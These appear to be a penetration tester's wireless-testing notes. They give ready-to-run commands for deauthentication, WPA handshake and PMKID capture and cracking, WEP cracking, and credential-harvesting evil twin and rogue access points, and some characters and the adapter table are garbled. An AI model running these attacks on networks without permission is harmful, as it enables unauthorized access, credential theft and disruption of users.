Pentest_Notes

πŸ“‘ Wireless Penetration Testing

Organized notes for wireless penetration testing. Last Updated: 2026-03-27

Overview

Wireless penetration testing focuses on assessing the security of Wi-Fi networks, including WPA/WPA2/WPA3 encryption, rogue access points, evil twin attacks, and client-side wireless attacks. This is occasionally relevant for internal engagements and physical assessments.

Reconnaissance

Checklist

Monitor Mode Setup

# Check wireless interfaces
iwconfig
ip link show

# Kill interfering processes
sudo airmon-ng check kill

# Start monitor mode
sudo airmon-ng start wlan0

# Verify
iwconfig wlan0mon

Network Discovery

# Scan all networks
sudo airodump-ng wlan0mon

# Target specific channel
sudo airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w capture

# Scan 5GHz band
sudo airodump-ng wlan0mon --band a

Tools

Tool Purpose Basic Command
airmon-ng Monitor mode management airmon-ng start wlan0
airodump-ng Wireless traffic capture airodump-ng wlan0mon
aireplay-ng Packet injection / deauth aireplay-ng -0 5 -a <BSSID> wlan0mon
aircrack-ng WPA/WEP key cracking aircrack-ng -w rockyou.txt capture.cap
Kismet Wireless network detector kismet -c wlan0mon
Wifite2 Automated wireless attacks wifite --kill
hcxdumptool PMKID capture hcxdumptool -i wlan0mon --enable_status=1
hcxpcapngtool Convert captures to hashcat hcxpcapngtool capture.pcapng -o hash.22000

Exploitation

WPA/WPA2 β€” 4-Way Handshake Capture & Crack

Checklist

# Step 1: Targeted capture
sudo airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w handshake

# Step 2: Deauth a specific client (in a new terminal)
sudo aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon

# Step 3: Wait for "WPA handshake: <BSSID>" in airodump output

# Step 4: Crack with aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

# Step 4 (Alternative): Crack with hashcat β€” faster on GPU
# Convert cap to hccapx
cap2hccapx handshake-01.cap handshake.hccapx

# Or convert to hashcat 22000 format (newer)
hcxpcapngtool handshake-01.cap -o handshake.22000

# Crack
hashcat -m 22000 handshake.22000 /usr/share/wordlists/rockyou.txt

WPA/WPA2 β€” PMKID Attack (Clientless)

# Capture PMKID (no client needed!)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 --filtermode=2 --filterlist_ap=<BSSID>

# Convert to hashcat format
hcxpcapngtool pmkid.pcapng -o pmkid.22000

# Crack
hashcat -m 22000 pmkid.22000 /usr/share/wordlists/rockyou.txt

πŸ’‘ Pro Tip: The PMKID attack doesn’t require any clients to be connected, making it much more reliable than handshake capture.

WEP Cracking (Legacy)

# Capture IVs
sudo airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w wep_capture

# Generate traffic (ARP replay)
sudo aireplay-ng -3 -b <BSSID> -h <YOUR_MAC> wlan0mon

# Crack when enough IVs captured (~40,000+)
aircrack-ng wep_capture-01.cap

WPA Enterprise β€” Evil Twin

# Using hostapd-mana or eaphammer
sudo python3 eaphammer --bssid <BSSID> --essid <SSID> --channel <CH> --interface wlan0mon --auth wpa-eap --creds

Automated Attacks with Wifite2

# Run wifite with all attacks
sudo wifite --kill

# Target specific network
sudo wifite --kill -e "TargetSSID"

Post-Exploitation

Checklist

# Connect to WPA network
wpa_passphrase "SSID" "password" > wpa.conf
sudo wpa_supplicant -i wlan0 -c wpa.conf -B
sudo dhclient wlan0

Rogue Access Point / Evil Twin

# Create a rogue AP with hostapd
# Configuration file: hostapd.conf
interface=wlan0mon
driver=nl80211
ssid=FreeWiFi
channel=6
hw_mode=g

# Start hostapd
sudo hostapd hostapd.conf

# Set up DHCP and routing for clients
sudo dnsmasq -C dnsmasq.conf
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Common Pitfalls / Gotchas

| Adapter | Chipset | Monitor Mode | Packet Injection | |β€”β€”β€”|β€”β€”β€”|:β€”:|:β€”:| | Alfa AWUS036ACH | RTL8812AU | βœ… | βœ… | | Alfa AWUS036AXML | MediaTek MT7921AU | βœ… | βœ… | | TP-Link TL-WN722N v1 | Atheros AR9271 | βœ… | βœ… | | Panda PAU09 | RT5572 | βœ… | βœ… |

References & Further Reading